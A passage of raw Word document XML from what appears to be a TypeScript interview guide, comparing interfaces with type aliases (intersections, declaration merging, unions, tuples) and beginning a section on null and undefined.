          <w:numId w:val="279"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types can be extended using intersections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE8C7B"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Employee = Person &amp; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27501876"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employeeId: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C72F2C"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2698FB0"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6BA3193"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Implementing with a class is not different from interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C97B0"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Manager implements Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E24191F"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name: string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4A076"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52ECC5C7"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employeeId: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C4752"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4F90170"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constructor(name: string, age: number, employeeId: number) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB8E7B3"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D98D8"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this.age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD4FA3"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this.employeeId = employeeId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E510C2"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5C0B592"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D028CBE" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Declaration Merging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DDFB50" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFEFEEF" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Supports declaration merging, where multiple declarations with the same name are merged into a single interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170AE41"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9D3F9"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21A5C190"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EFF7D70"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p>
    <w:p w14:paraId="5A7C2081"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7E794"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4F7BF620"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19E0FE7"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p>
    <w:p w14:paraId="07D4E870"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Equivalent to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5CA29"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43894695"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0465AB1B"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4B61F0A4"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759A883" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A25068" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Does not support declaration merging. If you declare the same type alias multiple times, it will result in an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB062AA"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Person = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5F337"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68106EB4"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973D49E"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BB09A73"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Error: Duplicate identifier 'Person'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121FA94"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Person = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F96E093"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7A3234F3"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3264E67" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9AB6A3" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D5061" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ideal for defining object shapes and classes, and for working with inheritance and extensibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE13F73" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Often used when you need to describe the shape of an object or a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C110C" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436ACE8" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>More flexible and can represent complex types like unions, intersections, tuples, and mapped types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70943F48" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Suitable for defining types that are not only objects but also primitives, unions, intersections, and other advanced type constructs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024CA8DE" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Primitive Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6FBED" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2BA48C" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cannot be used to define primitive types, tuples, or unions directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24543320" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A292B" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can define primitive types, tuples, and unions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74044900"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ID = number | string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6371789D"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32D035E" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48E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type Coordinates = [number, number];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6E8F1" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Complex Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75833D70" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8F45D" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Less flexible for creating union or intersection types directly. For complex type constructs, it's often more straightforward to use type aliases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C23653C" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF7348" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>More versatile in defining complex types, such as unions and intersections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDF4FE"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Status = "active" | "inactive";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ACAC9C"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p>
    <w:p w14:paraId="3F66AB92"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Person = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D0E424"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48CD2CB1"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0238668F"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8C330C6"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p>
    <w:p w14:paraId="0332F7F3"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Employee = Person &amp; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555ECB7D"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employeeId: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B16CAE" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF"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41F60E4" w14:textId="33CE1A3B" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc178383286"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle null and undefined in TypeScript?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="7AECFA3C" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Understanding null and undefined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048CFB2" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>undefined</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A variable that has been declared but not assigned a value is undefined. It is also the default return value of functions that do not explicitly return anything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454E244" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Represents the intentional absence of any object value. It is used to indicate that a variable should be explicitly empty.</w:t>
      </w:r>
    </w:p>
